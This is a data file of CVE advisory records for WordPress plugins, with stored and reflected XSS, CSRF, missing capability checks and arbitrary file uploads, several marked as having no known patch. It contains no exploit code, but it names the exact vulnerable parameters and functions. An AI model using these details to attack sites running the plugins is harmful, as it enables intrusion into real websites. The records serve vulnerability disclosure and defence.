{"CVE_ID":"CVE-2025-1008","slug":"recently-purchased-products-for-woo","versionImpact":"1.1.3","description":"The Recently Purchased Products For Woo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018view\u2019 parameter in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/recently-purchased-products-for-woo\\\/tags\\\/1.1.3\\\/includes\\\/class-rppw-public.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/recently-purchased-products-for-woo\\\/tags\\\/1.1.3\\\/includes\\\/class-rppw-public.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recently-purchased-products-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recently-purchased-products-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9ebcd32-90c1-419c-a67c-6fe41ee9fab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9ebcd32-90c1-419c-a67c-6fe41ee9fab1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13710","slug":"estatebud-properties-listings","versionImpact":"5.5.0","description":"The Estatebud \u2013 Properties & Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.0. This is due to missing or incorrect nonce validation on the 'estatebud_settings' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/estatebud-properties-listings\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/estatebud-properties-listings\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c43f4c91-329d-46b9-b2c8-f35e5baa38d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c43f4c91-329d-46b9-b2c8-f35e5baa38d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4597","slug":"woo-slider-pro-drag-drop-slider-builder-for-woocommerce","versionImpact":"1.12","description":"The Woo Slider Pro \u2013 Drag Drop Slider Builder For WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the woo_slide_pro_delete_draft_preview AJAX action in all versions up to, and including, 1.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-slider-pro-drag-drop-slider-builder-for-woocommerce\\\/trunk\\\/inc\\\/actions.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-slider-pro-drag-drop-slider-builder-for-woocommerce\\\/trunk\\\/inc\\\/actions.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eaee0f6-968c-4004-83e7-f79baf3ff88d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eaee0f6-968c-4004-83e7-f79baf3ff88d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1377","slug":"solidres","versionImpact":"0.9.4","description":"The Solidres WordPress plugin through 0.9.4 does not sanitise and escape numerous parameter before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c346ff80-c16b-4219-8983-708c64fa4a61\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c346ff80-c16b-4219-8983-708c64fa4a61\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2751","slug":"resume-upload-form","versionImpact":"1.2.0","description":"The Upload Resume WordPress plugin through 1.2.0 does not validate the captcha parameter when uploading a resume via the resume_upload_form shortcode, allowing unauthenticated visitors to upload arbitrary media files to the site.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b0fe0ac-d0d1-473d-af5b-dad6217933d4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b0fe0ac-d0d1-473d-af5b-dad6217933d4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7027","slug":"post-smtp","versionImpact":"2.8.7","description":"The POST SMTP Mailer \u2013 Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018device\u2019 header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e8911a3-ce0f-420c-bf2a-1c2929d01cef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e8911a3-ce0f-420c-bf2a-1c2929d01cef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/mobile.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/mobile.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3016126%40post-smtp%2Ftrunk&old=3012318%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3016126%40post-smtp%2Ftrunk&old=3012318%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22150","slug":"portfolio-elementor","versionImpact":"3.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PWR Plugins Portfolio & Image Gallery for WordPress | PowerFolio allows Stored XSS.This issue affects Portfolio & Image Gallery for WordPress | PowerFolio: from n\/a through 3.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/portfolio-elementor\\\/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/portfolio-elementor\\\/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1129","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.5.6","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the set_starred() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to mark records as starred.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53db0f72-3353-42bb-ad75-4c5aa32d7939?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1490\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1502\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0848","slug":"aa-calculator","versionImpact":"1.0","description":"The AA Cash Calculator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018invoice\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933ea8a2-3d1d-43a3-bb14-52f37576c9e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aa-calculator\\\/trunk\\\/aacalculation.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aa-calculator\\\/trunk\\\/aacalculation.php#L79\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5645","slug":"envo-extra","versionImpact":"1.8.23","description":"The Envo Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_css_id\u2019 parameter within the Button widget in all versions up to, and including, 1.8.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe53b09-84c6-4fb6-9a79-1e4987678129?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbe53b09-84c6-4fb6-9a79-1e4987678129?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/tags\\\/1.8.22\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/tags\\\/1.8.22\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L676\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/envo-extra\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/envo-extra\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098500\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098500\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5199","slug":"spotify-play-button","versionImpact":"1.0","description":"The Spotify Play Button WordPress plugin through 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2cb8d7d-6d7c-42e9-b3db-cb3959bfd41b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2cb8d7d-6d7c-42e9-b3db-cb3959bfd41b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6705","slug":"reglevel","versionImpact":"1.2.1","description":"The RegLevel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ead872-76a7-49c3-af07-d87a4c68183f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6ead872-76a7-49c3-af07-d87a4c68183f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/admin.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/admin.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reglevel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reglevel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/functions.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reglevel\\\/trunk\\\/includes\\\/functions.php#L11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6019","slug":"music-request-manager","versionImpact":"1.3","description":"The Music Request Manager WordPress plugin through 1.3 does not sanitise and escape incoming music requests, which could allow unauthenticated users to perform Cross-Site Scripting attacks against administrators","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5899c5c9-a550-4c86-a41d-7fcc1e84a7d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5899c5c9-a550-4c86-a41d-7fcc1e84a7d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9932","slug":"wux-blog-editor","versionImpact":"3.0.0","description":"The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c0ab2d-1ba9-4a0a-b1fa-bacebe1034eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c0ab2d-1ba9-4a0a-b1fa-bacebe1034eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52376","slug":"boat-rental-system","versionImpact":"1.0.1","description":"Unrestricted Upload of File with Dangerous Type vulnerability in cmsMinds Boat Rental Plugin for WordPress allows Upload a Web Shell to a Web Server.This issue affects Boat Rental Plugin for WordPress: from n\/a through 1.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/boat-rental-system\\\/wordpress-boat-rental-plugin-for-wordpress-plugin-1-0-1-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/boat-rental-system\\\/wordpress-boat-rental-plugin-for-wordpress-plugin-1-0-1-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12256","slug":"simple-video-management-system","versionImpact":"1.0.4","description":"The Simple Video Management System plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'analytics_video' parameter in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-video-management-system\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-video-management-system\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdaa6b7c-bf38-44b5-9d83-2918cbedc683?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdaa6b7c-bf38-44b5-9d83-2918cbedc683?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13218","slug":"fast-tube","versionImpact":"2.3.1","description":"The Fast Tube WordPress plugin through 2.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79eb9432-3e3c-4a23-88a8-05aa3146061c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79eb9432-3e3c-4a23-88a8-05aa3146061c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0990","slug":"gloria-assistant-by-webtronic-labs","versionImpact":"1.1.4","description":"The I Am Gloria plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the iamgloria23_gloria_settings_page function. This makes it possible for unauthenticated attackers to reset the tenant ID via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gloria-assistant-by-webtronic-labs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gloria-assistant-by-webtronic-labs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33fd44dc-b4f8-4429-8dcd-5161602bb318?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33fd44dc-b4f8-4429-8dcd-5161602bb318?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13690","slug":"wp-church-donation","versionImpact":"1.7","description":"The WP Church Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several donation form submission parameters in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-form-display.php\",\"name\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-form-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-listings.php\",\"name\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/wp-church-donation\\\/tags\\\/1.7\\\/includes\\\/church-donation-listings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-church-donation\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-church-donation\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8ac20f-d6ae-4e55-9337-4fb5ebd4f24a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8ac20f-d6ae-4e55-9337-4fb5ebd4f24a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8398","slug":"simple-nav-archives","versionImpact":"2.1.3","description":"The Simple Nav Archives WordPress plugin through 2.1.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f432901f-31dd-433c-91bf-ec19fa61b6d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f432901f-31dd-433c-91bf-ec19fa61b6d8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5235","slug":"opensheetmusicdisplay","versionImpact":"1.4.0","description":"The OpenSheetMusicDisplay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/opensheetmusicdisplay\\\/opensheetmusicdisplay\\\/blob\\\/develop\\\/CHANGELOG.md\",\"name\":\"https:\\\/\\\/github.com\\\/opensheetmusicdisplay\\\/opensheetmusicdisplay\\\/blob\\\/develop\\\/CHANGELOG.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opensheetmusicdisplay\\\/trunk\\\/opensheetmusicdisplay.php#L473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opensheetmusicdisplay\\\/trunk\\\/opensheetmusicdisplay.php#L473\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/#file48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301757\\\/#file48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opensheetmusicdisplay\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opensheetmusicdisplay\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a45417ce-d5dd-4706-adbb-d44670de6eb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a45417ce-d5dd-4706-adbb-d44670de6eb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2330","slug":"widgetkit-for-elementor","versionImpact":"2.5.4","description":"The All-in-One Addons for Elementor \u2013 WidgetKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button+modal' widget in all versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/button-modal\\\/template\\\/view.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widgetkit-for-elementor\\\/trunk\\\/elements\\\/button-modal\\\/template\\\/view.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283765\\\/widgetkit-for-elementor\\\/tags\\\/2.5.5\\\/elements\\\/button-modal\\\/template\\\/view.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283765\\\/widgetkit-for-elementor\\\/tags\\\/2.5.5\\\/elements\\\/button-modal\\\/template\\\/view.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widgetkit-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/widgetkit-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d5337b-8c06-41ee-b18c-2c39150a7f30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d5337b-8c06-41ee-b18c-2c39150a7f30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
